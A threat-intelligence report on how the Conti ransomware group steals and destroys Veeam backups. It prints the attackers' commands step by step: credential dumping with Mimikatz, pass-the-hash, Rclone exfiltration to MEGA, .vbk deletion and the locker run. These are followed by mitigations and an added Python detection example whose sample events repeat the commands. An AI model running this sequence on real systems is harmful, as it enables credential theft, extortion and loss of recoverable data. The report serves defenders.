URL: https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love

 
Sep 29, 2021 · 5 min read




BACKUP “REMOVAL” SOLUTIONS - FROM CONTI RANSOMWARE WITH LOVE

Updated: Oct 7, 2021

By Vitali Kremez & Yelisey Boguslavskiy





This redacted report is based on our actual proactive victim breach intelligence
and subsequent incident response (not a simulated or sandbox environment),
identified via unique high-value Conti ransomware collections at AdvIntel through
our product “Andariel.”






Key Takeaways



 * Backups are a major obstacle for any ransomware operation as they allow the
   victim to resume business by performing data recovery instead of paying
   ransom to the criminals.

 * Cyber groups specifically target backup solutions in order to ensure that the
   victim has no other option except for paying the ransom. Conti group is
   particularly methodical in developing and implementing backup removal
   techniques.

 * Conti’s tactics rely on the skills of their network intruders, or
   “pentesters”, to target on-premise and cloud backup solutions. Conti hunts
   for privileged Veeam users and services and leverages them to access,
   exfiltrate, remove and encrypt backups, so that ransomware breaches become
   un-“backupable”. This way, Conti simultaneously exfiltrates the data for
   further victim blackmail while leaving the victim with no chance of quickly
   recovering their files, since the backups are removed.

 * Maintaining well-developed protocols for access rights hierarchy, network
   security, and password hygiene, as well as systematic network monitoring
   aimed at spotting abnormal network behavior, may significantly reduce the
   chances of Conti successfully removing backups. The secure backup solutions
   and mitigations listed below will enable potential victims to leave Conti
   without their demanded ransom money.

Introduction






Conti is a top-tier Russian-speaking ransomware group specializing in double
extortion operations of simultaneous data encryption and data exfiltration.
Though Conti does use the blackmail aspect of data exfiltration, threatening to
publish the victims’ stolen files if the ransom is not paid, our deeper
visibility shows that the main leverage in Conti negotiations is data
encryption.






According to AdvIntel sensitive source intelligence, Conti builds its
negotiation strategy on the premise that the majority of targets who pay the
ransom are motivated primarily by the need to restore their data, while
preventing the data from being published is their secondary goal. If the victim
has the ability to restore the files via backups, the chances of a successful
ransom payment to Conti are minimized, even though the risk of data publishing
persists.






As a result, in order to ensure payments, Conti became strategic in addressing
this major obstacle and developed a methodology to remove backups in order to
force ransom payment.






Conti’s Holistic Vision for Attack Anatomy






Conti’s “backup removal solutions” begin at the team development level. When
selecting network intruders for their divisions, also known as “teams”, Conti is
particularly clear that experience related to backup identification,
localization, and deactivation is among their top priorities for a successful
pentester. This backup focus, built into the partnership-building process,
enables Conti to assemble teams equipped with the knowledge and skills needed
for backup removal.






The most novel tactics developed by such teams are centered around Veeam backup
software. Veeam is a backup, recovery, and data management solutions platform
for cloud, virtual, and physical environments.








Weaponized Creativity






Cobalt Strike via Corporation Breach Study






Routinely, Conti initiates their attacks via spam messages that deliver a Cobalt
Strike beacon backdoor directly. The targeted spam campaigns are meticulously
designed around selective research on the prospective target: adverse media
about them, their executives, and their employees. These campaigns are set up to
ensure that the spam emails are opened and the Cobalt Strike beacons are
executed.






Conti maintains this approach during the next step of the attack, when they
leverage the Atera module as well as the Ngrok application to establish
persistence. As previously reported by AdvIntel, Conti leverages the legitimate
remote management agent Atera to survive possible Cobalt Strike detections by
the endpoint detection and response platform. Relying on a legitimate tool to
achieve persistence is a core idea leveraged by the ransomware pentesting team.
The same applies to Ngrok, which Conti leverages to establish a tunnel to the
localhost that serves as a path for data exfiltration.








The data exfiltration itself is typically done by weaponizing Rclone. An Rclone
config is created and an external location (e.g., MEGA or FTP) for data
synchronization (data cloning) is established. Conti prioritizes data on network
shares, with a specific aim at documentation related to finance, legal,
accounting, insurance, and Information Technology.






Finally, Conti ensures that the victim will not be able to recover: they lock
the system and the backups and make sure the backups are removed. This can be
illustrated by the 2021 Cobalt Strike Beacon Backdoor campaign which AdvIntel
observed.





Cobalt Strike Backup Removal Sequence






I. Mimikatz and DCsync of Veeam users






run mimikatz's @lsadump::dcsync /domain:VICTIMORG.local /all /csv






II. Find privileged users for Veeam service



 * SharpView.exe Find-DomainUserLocation -UserIdentity svc-Veeam

 * SharpView.exe Get-DomainGPOComputerLocalGroupMapping -ComputerName svc-Veeam

 * SharpView.exe Get-NetLoggedon -ComputerName svc-Veeam

III. Impersonate a privileged backup user and establish Veeam backup privileges






a. Create a token from the clear-text password, if the password can be obtained
as clear text



 * make_token VICTIMORG.local\svc-Veeam <PASSWORD>

b. Pass-The-Hash technique:



 * run mimikatz's sekurlsa::pth /user:svc-Veeam /domain:VICTIMORG.local
   /ntlm:HASH /run:"%COMSPEC% /c echo <VALUE> > \\.\pipe\<VALUE>"

IV. Download Veeam backups configurations



 * download
   c:\Users\administrator.VICTIMORG\AppData\Roaming\Veeam_Software_Group_GmbH\Veeam.EndPoint.Tray.exe_Url_<ID>\1.0.0.0\user.config

V. Download Veeam Guest Helper logs



 * download
   \\VICTIMORG.local\C$\ProgramData\Veeam\Backup\VeeamGuestHelper_<DATE>.log

VI. Exfiltration of Veeam Backups via Rclone



 * shell rclone.exe copy --max-age 2y "\\VEEAM.VICTIMORG.local\" mega:VEEAM -q
   --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7
   --bwlimit 10M

VII. Manual removal of Veeam Backups .vbk



 * rm D:\VeeamBackup\VICTIMORG backup\VICTIMORG<DATE>.vbk

VIII. Conti locker of Veeam-designated local domains



 * shell start C:\locker.exe -m -net -size 10 -nomutex -p
   \\VEEAM.VICTIMORG.local\<DRIVE>$\Backups

As demonstrated above, by compromising the Veeam account Conti has a method to
defeat the backup software and “force” ransom payment.







Veeam Mitigation & Statement on How to Harden Installations:







When the attackers have access to the domain admin account, there is little
[Veeam] can do to protect the installation. That's why [Veeam] usually
recommends using a separate domain to run backup software; this could protect
the [Veeam] instance in case the primary domain is compromised.







Another approach to protect from ransomware would be to use immutable
repositories; they can be considered safe (if configured correctly), because
they allow only appending new data, not altering/purging existing backups.







Mitigations & Recommendation






To prevent Conti backup removal attacks, a holistic mitigation framework should
be applied:



 1. To prevent attack initiation, employee training and email security
    protocols should be implemented. Conti uses very developed social
    engineering techniques in order to convince the victim employees that the
    targeted emails are legitimate.

 2. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an
    alternative means for attack initiation. Tracking externally exposed
    endpoints is therefore critical.

 3. To prevent lateral movement, network hierarchy protocols should be
    implemented together with network segregation and decentralization.

 4. Audit and/or block command-line interpreters by using whitelisting tools,
    like AppLocker or Software Restriction Policies, with a focus on any
    suspicious “curl” command and unauthorized “.msi” installer scripts,
    particularly those run from the C:\ProgramData and C:\Temp directories.

 5. Rclone and other data exfiltration command-line interface activities can be
    captured through proper logging of process execution with command-line
    arguments.

 6. Special security protocols, password updates, and account security measures
    for Veeam should be implemented to prevent Veeam account takeover. Intact
    backups tremendously decrease Conti’s ransom demands and can likely lead to
    data recovery with zero payments to the Conti collective.
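To make mitigation 5 concrete, here is an added detection example in Python (not from the AdvIntel report or from Veeam): it runs three defender-side rules over constructed process-creation records that carry the full command line, flagging Rclone transfers to an unapproved remote, shell deletion of Veeam .vbk files, and a backup service account spawning processes outside the backup software's directory. The account name, the sanctioned remote, the Veeam install path and all sample events are assumptions.

```python
import re

# Added example, not from the AdvIntel report: defender-side rules over process-creation
# events that record user, image path and full command line. Every account name, path,
# remote name and sample event below is constructed for illustration.
APPROVED_RCLONE_REMOTES = {"backup-nas"}                 # assumption: sanctioned rclone remotes
BACKUP_SERVICE_ACCOUNTS = {"victimorg\\svc-veeam"}        # assumption: Veeam service account
BACKUP_SOFTWARE_DIRS = ("c:\\program files\\veeam\\",)    # assumption: where Veeam binaries live

# rclone <transfer-subcommand> ...; a destination such as "mega:VEEAM" is a <remote>: token.
RCLONE_RE = re.compile(r"\brclone(?:\.exe)?\b.*?\b(copy|copyto|sync|move|moveto)\b(.*)", re.I)
REMOTE_RE = re.compile(r"(?<![\w\\:])([A-Za-z][\w-]*):(?![\\/])")  # skips D:\ drive letters
VBK_DELETE_RE = re.compile(r"\b(del|erase|rm|rmdir|remove-item)\b.*\.vbk\b", re.I)

SAMPLE_EVENTS = [  # constructed, modelled on the sequence described in the report
    {"user": r"VICTIMORG\svc-Veeam", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r'rclone.exe copy --max-age 2y "\\VEEAM.VICTIMORG.local\" mega:VEEAM -q '
                r"--ignore-existing --auto-confirm --transfers 7 --bwlimit 10M"},
    {"user": r"VICTIMORG\svc-Veeam", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c del /q "D:\VeeamBackup\VICTIMORG backup\VICTIMORG2021.vbk"'},
    {"user": r"VICTIMORG\jdoe", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone.exe sync D:\Reports backup-nas:reports"},  # sanctioned remote
    {"user": r"VICTIMORG\jdoe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir D:\Reports"},
]

def classify(event):
    """Return (rule, detail) findings for one event; an empty list means no alert."""
    findings = []
    cmd, user, image = event["cmdline"], event["user"].lower(), event["image"].lower()

    m = RCLONE_RE.search(cmd)
    if m:  # rclone transfer whose destination remote is not on the allowlist
        remotes = [r for r in REMOTE_RE.findall(m.group(2))
                   if r.lower() not in APPROVED_RCLONE_REMOTES]
        if remotes:
            findings.append(("rclone_unapproved_remote", f"{m.group(1)} to {','.join(remotes)}"))

    if VBK_DELETE_RE.search(cmd):  # Veeam backup files (.vbk) deleted from a shell
        findings.append(("veeam_backup_file_deletion", cmd))

    if user in BACKUP_SERVICE_ACCOUNTS and not image.startswith(BACKUP_SOFTWARE_DIRS):
        findings.append(("backup_service_account_unexpected_process", image))
    return findings

def scan(events):
    """Map each event's index to its findings for a batch of process-creation records."""
    return {i: classify(e) for i, e in enumerate(events)}
```

The rules assume command-line arguments are logged (Sysmon process creation or Windows security auditing with command-line logging); without that field, the Rclone and .vbk rules have nothing to match.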

Disrupt ransomware attacks & prevent data stealing with AdvIntel’s threat
disruption solutions. Sign up for AdvIntel services and get the most actionable
intel on impending ransomware attacks, adversarial preparations for data
stealing, and ongoing network investigation operations by the most elite
cybercrime collectives.






 * Ransomware



